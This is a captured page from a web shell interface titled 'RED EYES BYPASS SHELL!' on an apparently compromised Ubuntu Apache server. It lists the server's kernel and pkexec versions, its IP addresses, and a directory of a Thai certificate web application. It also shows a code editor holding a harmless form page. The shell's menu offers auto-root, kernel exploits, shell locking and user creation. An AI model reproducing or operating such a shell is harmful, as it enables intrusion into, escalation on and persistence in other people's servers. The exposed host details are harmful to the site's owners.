Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
mpdf /
view_from7 /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
add.php
3.44
KB
-rwxr-xr-x
edit.php
3.81
KB
-rwxr-xr-x
from7.pdf
434.03
KB
-rwxr-xr-x
index.php
5.03
KB
-rwxr-xr-x
pdfpage1.php
640
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add.php
<?php include("../layout/header.html"); ?> <?php include("../layout/slide-bar.php"); ?> <main id="main" class="main"> <div class="pagetitle"> <h1>เกียรติบัตร</h1> <nav> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">หน้าแรก</a></li> <li class="breadcrumb-item active">เกียรติบัตร</li> </ol> </nav> </div><!-- End Page Title --> <!-- Content --> <section class="section"> <div class="card"> <div class="card-body"> <h5 class="card-title"> ฟอร์ม <span>| เกียรติบัตร</span> </h5> <form class="form" id="FormData"> <div class="row"> <div class="col-md-6"> <label for="txtordering" class="form-label">ลำดับ <span>/ 2556</span></label> <input type="text" class="form-control" id="txtordering" name="txtordering"> </div> <div class="col-md-6"> <label for="txtfullname" class="form-label">ชื่อ-สกุล ผู้เข้าเรียน</label> <input type="text" class="form-control" id="txtfullname" name="txtfullname"> </div> </div> <hr> <div class="row"> <div class="col-md-9 offset-md-3"> <button type="button" class="btn btn-primary" id="btnSave"><i class="bi bi-cloud-upload-fill"></i> บันทึกข้อมูล</button> <a href="index.php" role="button" class="btn btn-secondary" id="btnBack" ><i class="bi bi-arrow-left-circle"></i> กลับ</a> </div> </div> </form> </div> </div> </section> </main><!-- End #main --> <script> $(document).ready(function(){ getData(); function getData(){ $.ajax({ headers: {'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')}, url: "../function_from7/selectcountdata.php", type: "POST", success: function( response ) { let dataResult = JSON.parse(response); if(dataResult.result==true){ $('#txtordering').val(dataResult.ordering); }else{ $('#txtordering').val(1); } } }); } $('#btnSave').click(function() { $('#btnSave').html('กำลังบันทึก...'); $("#btnSave").attr("disabled", true); $.ajax({ headers: {'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')}, url: "../function_from7/insertdata.php", type: "POST", data: $('#FormData').serialize(), success: function( response ) { var dataResult = JSON.parse(response); if(dataResult.result==true){ Swal.fire({ title: 'บันทึกสำเร็จ', icon: 'success', html: 'ข้อมูลของคุณถูกบันทึกเรียบร้อยแล้ว', showDenyButton: false, showCancelButton: false, confirmButtonText: 'ตกลง', }).then((result) => { window.location = "index.php"; }) } $("#btnSave"). attr("disabled", false); } }); }); }); function checkCase(){ } </script> <?php include("../layout/footer.html"); ?>
Close